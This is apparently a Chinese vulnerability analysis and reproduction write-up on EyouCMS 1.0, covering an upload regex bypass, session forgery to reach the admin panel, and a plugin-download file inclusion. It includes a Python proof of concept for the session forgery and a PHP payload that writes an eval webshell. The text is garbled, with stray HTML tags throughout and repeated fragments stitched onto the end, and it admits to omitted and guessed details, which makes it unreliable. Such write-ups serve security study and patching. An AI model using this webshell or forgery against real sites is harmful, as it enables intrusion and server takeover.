EyouCMS 1.0 前台Getshell漏洞分析与复现<\/h1>

免责声明<\/h2>
本文档所有安全技术内容仅供学习、研究与讨论之用，请勿用于非法用途。<\/p>

漏洞概述<\/h2>

EyouCMS 1.0版本存在多个安全漏洞，包括：<\/p>

前台文件上传Getshell漏洞<\/li>
Session越权漏洞<\/li>

文件包含Getshell漏洞<\/li> <\/ol>

漏洞一：前台文件上传Getshell<\/h2>

漏洞位置<\/h3>
`application\/api\/controller\/Uploadify.php<\/code>文件中的preview<\/code>函数<\/p>`

漏洞分析<\/h3>

API使用php:\/\/input<\/code>协议接收输入<\/li>
原本设计用于接收图片文件，通过正则限制文件后缀<\/li>
但正则匹配存在缺陷，可被绕过写入PHP文件<\/li>
<\/ol>
漏洞利用<\/h3>

构造恶意请求，修改文件后缀为.php<\/code><\/li>
通过编码数据写入恶意代码<\/li>
<\/ol>
API路径<\/h3>
未在原文中明确给出，需通过代码审计确定<\/p>
修复建议<\/h3>
使用白名单机制限制上传文件类型<\/p>
漏洞二：Session越权+文件包含Getshell<\/h2>
第一部分：Session越权<\/h3>
登录逻辑分析<\/h4>
位于application\/admin\/controller\/Base.php<\/code>文件<\/p>

首先检查是否存在admin_id<\/code>：

如果已登录，直接跳转后台<\/li>
否则继续登录流程<\/li>
<\/ul>
<\/li>
默认开启验证码验证<\/li>
基础检测用于存储session<\/li>
验证账号密码<\/li>
获取用户权限（基于admin_info<\/code>中的role_id<\/code>）<\/li>
存储session参数<\/li>
<\/ol>
Session伪造方法<\/h4>
位于application\/api\/controller\/Ajax.php<\/code>文件中的token方法<\/p>

需要IS_AJAX<\/code>为真（通过设置HTTP_X_REQUESTED_WITH<\/code>头为xmlhttprequest<\/code>）<\/li>
可设置session中的任意键值，包括admin_id<\/code><\/li>
<\/ol>
利用步骤<\/h4>

构造请求设置admin_id<\/code><\/li>
需要满足条件：

session('admin_id') > 0<\/code><\/li>
通过不断尝试直到获取以数字开头的hash值<\/li>
<\/ul>
<\/li>
绕过超时检测（位于application\/admin\/controller\/Base.php<\/code>）<\/li>
<\/ol>
超时检测绕过<\/h4>

需要满足三个条件：

session存在<\/li>
有效的token（通过不断发包碰撞）<\/li>
check_priv<\/code>返回true（0 >= session('admin_info.role_id')<\/code>）<\/li>
<\/ul>
<\/li>
<\/ol>
POC脚本<\/h4>
# 示例脚本逻辑（需根据实际情况调整）<\/span>
<\/span><\/span>import<\/span> requests
<\/span><\/span>
<\/span><\/span># 1. 设置admin_id<\/span>
<\/span><\/span>session =<\/span> requests.<\/span>Session()
<\/span><\/span>ajax_url =<\/span> "http:\/\/target.com\/api\/ajax\/token"<\/span>
<\/span><\/span>headers =<\/span> {
<\/span><\/span>    "X-Requested-With"<\/span>: "xmlhttprequest"<\/span>
<\/span><\/span>}
<\/span><\/span>data =<\/span> {
<\/span><\/span>    "name"<\/span>: "admin_id"<\/span>,
<\/span><\/span>    "value"<\/span>: "1"<\/span>  # 需要不断尝试直到获取有效值<\/span>
<\/span><\/span>}
<\/span><\/span>session.<\/span>post(ajax_url, headers=<\/span>headers, data=<\/span>data)
<\/span><\/span>
<\/span><\/span># 2. 访问后台<\/span>
<\/span><\/span>admin_url =<\/span> "http:\/\/target.com\/admin"<\/span>
<\/span><\/span>response =<\/span> session.<\/span>get(admin_url)
<\/span><\/span>if<\/span> "管理后台"<\/span> in<\/span> response.<\/span>text:
<\/span><\/span>    print("成功越权进入后台"<\/span>)
<\/span><\/span><\/code><\/pre>第二部分：文件包含Getshell<\/h3>
漏洞位置<\/h4>
application\/admin\/controller\/Weapp.php<\/code>中的downloadInstall<\/code>方法<\/p>
漏洞分析<\/h4>

存在文件包含点<\/li>
需要控制文件内容并触发包含<\/li>
<\/ol>
利用条件<\/h4>

绕过host检查（必须为eyoucms.com<\/code>）

方法：在官网评论处上传文件，获取eyoucms.com<\/code>域下的文件路径<\/li>
<\/ul>
<\/li>
下载并解压文件<\/li>
包含恶意文件<\/li>
<\/ol>
利用步骤<\/h4>

在官网评论处上传恶意文件（需新用户权限）<\/li>
获取文件路径（如http:\/\/eyoucms.com\/uploads\/xxx<\/code>）<\/li>
通过插件管理触发文件下载<\/li>
服务器下载并解压文件<\/li>
触发文件包含执行恶意代码<\/li>
<\/ol>
恶意文件示例<\/h4>
<?<\/span>php<\/span>
<\/span><\/span>\/\/ 恶意代码，写入webshell
<\/span><\/span><\/span><\/span>file_put_contents<\/span>('shell.php'<\/span>, '<?php @eval($_POST["cmd"]);?>'<\/span>);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>访问路径<\/h4>

生成的shell文件路径：\/shell.php<\/code><\/li>
使用webshell管理工具连接<\/li>
<\/ol>
其他Getshell方法<\/h2>
原文提到存在其他Getshell方法，但未详细说明，可能包括：<\/p>

反序列化漏洞<\/li>
其他文件上传点<\/li>
数据库操作导致的代码执行<\/li>
<\/ol>
参考链接<\/h2>

https:\/\/www.moonsec.com\/6078.html<\/li>
https:\/\/n1k0la-t.github.io\/2023\/01\/28\/EyouCMS%20v1.6.1%200day%E6%8C%96%E6%8E%98\/#EyouCMS-v1-6-1-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E<\/li>
<\/ol>
修复建议<\/h2>

对所有上传功能实施严格的白名单验证<\/li>
加强session管理，防止未授权修改<\/li>
限制文件包含功能，禁用动态包含<\/li>
更新到最新版本<\/li>
<\/ol>

EyouCMS 1.0 前台Getshell漏洞分析与复现<\/h1>

免责声明<\/h2> 本文档所有安全技术内容仅供学习、研究与讨论之用，请勿用于非法用途。<\/p>

漏洞一：前台文件上传Getshell<\/h2>

漏洞位置<\/h3> application\/api\/controller\/Uploadify.php<\/code>文件中的preview<\/code>函数<\/p>

API路径<\/h3> 未在原文中明确给出，需通过代码审计确定<\/p>

修复建议<\/h3> 使用白名单机制限制上传文件类型<\/p>

漏洞二：Session越权+文件包含Getshell<\/h2>

第一部分：Session越权<\/h3>

第二部分：文件包含Getshell<\/h3>

漏洞位置<\/h4> application\/admin\/controller\/Weapp.php<\/code>中的downloadInstall<\/code>方法<\/p>

修复建议<\/h2> 对所有上传功能实施严格的白名单验证<\/li> 加强session管理，防止未授权修改<\/li> 限制文件包含功能，禁用动态包含<\/li> 更新到最新版本<\/li> <\/ol>

免责声明<\/h2>
本文档所有安全技术内容仅供学习、研究与讨论之用，请勿用于非法用途。<\/p>

漏洞位置<\/h3>
`application\/api\/controller\/Uploadify.php<\/code>文件中的preview<\/code>函数<\/p>`

API路径<\/h3>
未在原文中明确给出，需通过代码审计确定<\/p>

修复建议<\/h3>
使用白名单机制限制上传文件类型<\/p>

漏洞位置<\/h4>
`application\/admin\/controller\/Weapp.php<\/code>中的downloadInstall<\/code>方法<\/p>`

修复建议<\/h2>

对所有上传功能实施严格的白名单验证<\/li>
加强session管理，防止未授权修改<\/li>
限制文件包含功能，禁用动态包含<\/li>
更新到最新版本<\/li> <\/ol>